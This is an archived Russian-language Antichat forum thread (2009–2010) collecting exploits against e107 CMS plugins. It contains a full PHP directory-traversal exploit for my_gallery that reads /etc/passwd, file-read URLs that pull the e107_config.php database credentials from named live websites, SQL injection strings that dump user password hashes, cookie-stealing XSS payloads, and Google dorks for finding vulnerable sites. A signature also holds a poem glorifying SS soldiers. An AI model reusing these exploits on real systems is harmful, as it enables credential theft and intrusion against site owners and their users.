ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

e107 Plugin my_gallery 2.4.1 Exploit
  #1  
Старый 24.07.2009, 02:09
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию e107 Plugin my_gallery 2.4.1 Exploit

e107 Plugin my_gallery 2.4.1 Exploit


Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0

Код:
<?php

/*

============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================

Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net

* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.

Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list


=============
[o] Usage [o]
=============

Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read

Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd

Then Go!!!


==============
[o] Greetz [o]
==============

MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

FUCK TERORIS!!

*/

$vuln  = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';

echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";

if ($_POST['_xpl']) {
	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
	$data .= "Host: {$host}\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html  = sendpacket($host,$data);
	print '<pre>'.htmlspecialchars($html).'</pre>';
}

echo "</form>";

function sendpacket($host,$data) {
	if (!$sock = @fsockopen($host,80)) {
		die("[!] Connection refused, try again!\n");
	}
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
}

?>

# milw0rm.com [2009-07-23]
 

  #2  
Старый 26.08.2009, 15:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Solide Snake  
e107 Plugin my_gallery 2.4.1 Exploit


Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
1.image.php?file='; это в файле image постом выше


2.Читалка файлов

Файл dload.php

PHP код:
<?php
$file 
$_GET['file'];
$date_txt date("y-m-d_H-i-s");
$text "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
все тоже самое тока в еще одном файле

Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd


там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки

Код:
<br />
<b>Warning</b>:  readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
*conf DB

http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php

Последний раз редактировалось HAXTA4OK; 26.08.2009 в 16:57..
 

  #3  
Старый 29.08.2009, 14:56
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308
Цитата:
http://www.obqvizapavlikeni.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
 

  #4  
Старый 19.09.2009, 19:54
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

XSS в модуле YouTube Gallery(ytm_gallery):
Код:
e107_plugins/ytm_gallery/ytm.php?paging=<script>alert()</script>
© Nightmare
 

  #5  
Старый 08.11.2009, 18:36
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

e107(e107_v0.7.16_standart_RUS)


active XSS in comment's news
Код:
......./path/comment.php?comment.news.[id]
Submit comment
Subject: <script>alert(//)</script>
Comment:<script>alert(//)</script>

куки имеют вид:
1.1a1dc91c907325c69271ddf0c944bc72
id.md5(pass)


при инстале префикс таблиц не фильтруется
Код:
mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
 

  #6  
Старый 08.11.2009, 18:46
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

активки не во всех сборках, в норм версиях фильтрация стоит.
 

  #7  
Старый 08.11.2009, 19:12
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]

1:
Код:
-1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
2:
Код:
-1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--
 

  #8  
Старый 09.12.2009, 13:53
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Межсайтовый скриптинг e107 ветки 0.x

Код:
Referer: "><script>alert(document.cookie)</script>
(c)
 

e107_plugins
  #9  
Старый 27.04.2010, 22:21
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию e107_plugins

Расскрытие путей
При простом переходе на файл e107_plugins/e107shop/features.php

пример :
PHP код:
http://northfloridahomebuilder.com/e107_plugins/e107shop/features.php 
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 

  #10  
Старый 30.04.2010, 03:50
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

AutoGallery v3.1_beta
[скачано]

в гугле:
inurl:e107_plugins/autogallery
Результаты 1 - 10 из примерно 132 000

путь в информации!
http://e107/e107_plugins/autogallery/help.php
Цитата:
Z:\home\e107\www\e107_plugins\autogallery\Gallery
пути (бес параметров запрос послать!):
http://e107/e107_plugins/autogallery/xmlplaylist.php
http://e107/e107_plugins/autogallery/editaction.php

пассивная XSS
e107_plugins/autogallery/arcade.php
PHP код:
....
// Do different things when the flash game gives different requests
$sessdo $_POST['sessdo'];

if (
$sessdo != ''

    
// Session start to get the game name - $title
    
$microone $_POST['microone'];
    
$score $_POST['score'];
    
$gametime $_POST['gametime'];
    
    
// Keep feeding that flash!
    
switch($sessdo
    { 
        case 
'sessionstart'
            
// Give it some random crap it doesn't really need (the initbar figure and lastid)
            
echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x"
            exit; 
            break;
    
         
// Give it permission for... no apparent reason
        
case 'permrequest':
            
// Notice $microone = $score;  -__VERY IMPORTANT__
            
$microone $score;
            echo 
"&validate=1&microone=$microone";
            exit;
            break; ... 
target:
Цитата:
http://[host]/[path]/e107_plugins/autogallery/arcade.php
Result (шлем POST!):
sessdo=sessionstart
gametime=<script>alert(/XSS/)</script>
или
sessdo=permrequest
microone=<script>alert(/XSS/)</script>

<form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST">
<input type=text name=sessdo value=sessionstart><br>
<input type=text name=gametime value='<script>alert(/XSS/)</script>'><br>
<input type=submit value=Отправить>
</form>

Последний раз редактировалось Strilo4ka; 30.04.2010 в 06:48..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ